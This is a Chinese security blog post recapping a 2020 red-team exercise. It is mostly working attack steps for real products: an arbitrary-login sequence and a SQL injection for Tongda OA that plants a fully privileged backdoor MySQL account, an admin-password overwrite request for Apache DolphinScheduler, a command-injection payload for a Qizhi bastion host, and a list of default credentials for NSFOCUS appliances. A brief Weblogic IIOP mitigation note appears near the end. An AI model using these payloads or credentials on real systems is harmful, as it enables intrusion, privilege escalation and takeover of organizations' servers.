红队小伙子都很有精神哦,蜜罐数据全都是你的脚印~

红队大叔: 叮! 新的主机上线。这得晚上加餐了吧。

蓝队小哥: 枉我三日的痴心,终究是错付了她。

0、通达OA任意用户登录

1、首先访问 /ispirit/login_code.php 获取 codeuid。

2、访问 /general/login_code_scan.php 提交 post 参数：

uid=1&codeuid={9E908086-342B-2A87-B0E9-E573E226302A}

3、最后访问 /ispirit/login_code_check.php?codeuid=xxx

这样 $_SESSION 里就有了登录的信息了。

1、通达OA v11.7 后台SQL注入

来源:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw

利用条件:需要登录权限,文章作者给出了利用链注入加mysql权限,又是写木马的。确实用起来很舒服。

/general/hr/manage/query/delete_cascade.php?condition_cascade=

select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

1、添加一个mysql用户

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

2、给创建的ateam666账户添加mysql权限。

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('ateam666' AS Binary(5));

3、刷新数据库就可以登录到数据库啦。

/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

4、通达OA配置mysql默认是不开启外网访问的所以需要修改mysql授权登录。

/general/hr/manage/query/delete_cascade.php?condition_cascade=

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

5、接下来就是考验mysql提权功底的时候啦 233...

2、Apache DolphinScheduler权限覆盖漏洞[CVE-2020-13922]

大概就长这个样子,默认密码[HW平安夜: 09/12 态势感知]有写到。

POST /dolphinscheduler/users/update
id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=

3、齐治堡垒机远程代码执行

据说还是另外一个版本是java的。

POST /shterm/listener/tui_update.php

a=["t';import os;os.popen('whoami')#"]

4、绿盟安全产品默认密码排查列表

来源:群里老大哥

IPS入侵防御系统、SASH运维安全管理系统、SAS安全审计系统、DAS数据库审计系统、RSAS远程安全评估系统、WAF WEB应用防护系统

sysauditor/sysauditor

sysmanager/sysmanager

supervisor/supervisor

maintainer/maintainer

webpolicy/webpolicy

sysadmin/sysadmin

conadmin/conadmin

supervis/supervis

webaudit/webaudit

sysadmin/sysadmin

conadmin/nsfocus

weboper/weboper

auditor/auditor

weboper/weboper

nsadmin/nsadmin

admin/nsfocus

admin/admin

shell/shell

Weblogic  GIOP 反序列化漏洞（0day），攻击者通过反序列化可以进行任意代码执行，请各单位立即排查。

建议关闭Weblogic IIOP 协议，关闭方式如下：

1.打开Weblogic 控制台。

2.选择“服务”->”AdminServer”->”协议”，取消“启用 IIOP”的勾选。

3.重启 Weblogic 项目，使配置生效。

回顾一下HW 2020/09/14:

今天也护网行动也慢慢走向高潮了,高级的玩法也已经有人开始玩起来了。

看来明天去上班要带上一根棍子了,敲几个无人机下来拿去卖钱哼哼。

漏洞利用工具火爆,不要随便在微信群内下载使用。2333

本文作者：渗了个透

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/141154.html